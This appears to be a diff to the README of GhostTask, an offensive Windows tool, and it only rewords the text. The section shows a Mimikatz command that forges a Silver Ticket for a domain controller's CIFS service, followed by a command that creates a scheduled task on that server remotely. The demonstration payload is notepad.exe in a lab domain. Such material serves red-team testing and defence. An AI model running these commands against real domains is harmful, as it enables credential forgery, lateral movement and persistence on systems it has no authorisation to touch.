netero1010/GhostTask/ReadMe.md

 ### 3. Create a new scheduled task on remote computer:

-As discussed in the WithSecure blog ([Extra: Lateral Movement](https://labs.withsecure.com/publications/scheduled-task-tampering) section), you can use specially crafted Silver Ticket to modify registry keys associated to scheduled tasks on .
-This allows you to create a scheduled task remotely.
+As outlined in the WithSecure blog ([Extra: Lateral Movement](https://labs.withsecure.com/publications/scheduled-task-tampering) section), this technique can be used to remotely create a new scheduled task with a specially crafted Silver Ticket.
 ```
 kerberos::golden /domain:LAB.CORP /sid:S-1-5-21-1111111111-1111111111-1111111111 /aes256:[aes256hash] /user:Administrator /service:cifs /target:dc01.lab.corp /sids:S-1-5-18 /endin:600 /renewmax:10080
 ```

-Create a new scheduled task on the DC01 server remotely, which will launch notepad.exe every day at 3:19 pm:
+Create a new scheduled task remotely on the DC01 server that launches notepad.exe every day at 3:19 PM:
 ```
 GhostTask.exe DC01.lab.corp add demo "cmd.exe" "/c notepad.exe" LAB\Administrator daily 15:19
 ```